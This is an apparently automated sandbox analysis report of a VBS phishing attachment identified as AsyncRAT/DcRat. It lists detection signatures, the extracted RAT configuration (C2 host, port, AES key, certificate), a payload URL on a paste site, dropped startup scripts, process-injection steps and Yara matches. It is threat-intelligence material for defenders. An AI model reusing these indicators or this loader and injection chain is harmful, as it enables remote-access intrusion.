Windows Analysis Report
Re-RFQ - PN List.vbs

Overview

General Information

Sample Name: Re-RFQ - PN List.vbs
Analysis ID: 627719
MD5: 867aa07dd614380e5943bccd70fee675
SHA1: b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256: 35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9
Tags: vbs
Infos:

Detection

AsyncRAT, DcRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected RUNPE
System process connects to network (likely due to code injection or exploit)
Yara detected DcRat
Yara detected AsyncRAT
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Writes to foreign memory regions
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
.NET source code references suspicious native API functions
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection

barindex
Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "sky01.publicvm.com", "Ports": "9217", "Version": " 1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "5RESCY68ciiacdgkayNo6rGfK4TKsWv4", "Mutex": "DcRatMutex_qwqdanchun", "AntiDetection": "null", "External_config_on_Pastebin": "false", "BDOS": "1", "Startup_Delay": "Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==", "HWID": "null", "Certificate": "MIICMDCCAZmgAwIBAgIVANDdhyIzFkRkVUdU1pUsWShwjeXTMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIwMTEyNzIxMjU0NVoXDTMxMDkwNjIxMjU0NVowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJAPN6hAAYtlFpprsg+awNYGXe+gvrIVoVQz2ubNjglQKceBMbhrB9fJZfXJkDLol6/a3Jd4JycS51W+zZgLbcjK8rwRyJ+AUI9TJN4ghCPvSgqXiqTzwruPo+z8B41xcddSJ8Iv49ReFpZGNfbzC4AL5U3gWj+Gq+o4Eh1TigrrAgMBAAGjMjAwMB0GA1UdDgQWBBSieJAE4Zd65wRgTOwM9yD2xjDKZjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH+wbEwYgTSF3NRuSaLbjALT8E5lmhrkkc7l8R7dojnqZqGA6GqIR3B1aERDKeX6YY3msdmw4uK4K7qWXuWRhjn1Zbweea4YrUyTLtTu1OYJpE9z7vVTfXi7Pkl+j9187kZ8f+S+EvFo9aw2YO5jK9UTyZ8dhtQuhpC9sRSCwQ5f", "ServerSignature": "WoklUUd+SGm6e+hGmYIVMdTguE/XnNLwPxGmIOoxt2UjxnKg6OsTdNTB9cmWQ+jVcpyD/M40s29l+GdlklpBRG3mflrHprg7R+Q9GKMdUToU8MO6imLwgYm5Ft0mzcc8W5sb5cqZ4Bg8wPJ907IBJ3Gd0vUUtxJgxLqCP7AFfis=", "Group": "false"}
Source: Re-RFQ - PN List.vbs ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\gia9ab2dg0.PS1 Avira: detection malicious, Label: DR/PShell.G2
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs Avira: detection malicious, Label: VBS/PSRunner.VPAY
Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File opened: c:\Users\user\AppData\Roaming\ Jump to behavior

Networking

barindex
Source: C:\Windows\System32\wscript.exe Network Connect: 199.102.48.248 1433 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: SQL8003.site4now.net
Source: Traffic Snort IDS: 2034847 ET TROJAN Observed Malicious SSL Cert (AsyncRAT) 91.193.75.216:9217 -> 192.168.2.6:49759
Source: Traffic Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 91.193.75.216:9217 -> 192.168.2.6:49759
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Malware configuration extractor URLs: sky01.publicvm.com
Source: Joe Sandbox View ASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 148.72.177.212 148.72.177.212
Source: Joe Sandbox View IP Address: 199.102.48.248 199.102.48.248
Source: unknown HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: global traffic TCP traffic: 192.168.2.6:49732 -> 199.102.48.248:1433
Source: global traffic TCP traffic: 192.168.2.6:49759 -> 91.193.75.216:9217
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.535727725.000001B3CCE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.510131517.0000024666F8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.538521959.000001D3A68A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5%
Source: wscript.exe, 00000000.00000003.389995366.000001C9E3EEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6699eb21577f6
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://textbin.net
Source: powershell.exe, 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://textbin.net/raw/gia9ab2dg0
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://textbin.net/raw/gia9ab2dg00y
Source: unknown DNS traffic detected: queries for: SQL8003.site4now.net
Source: global traffic HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

System Summary

barindex
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
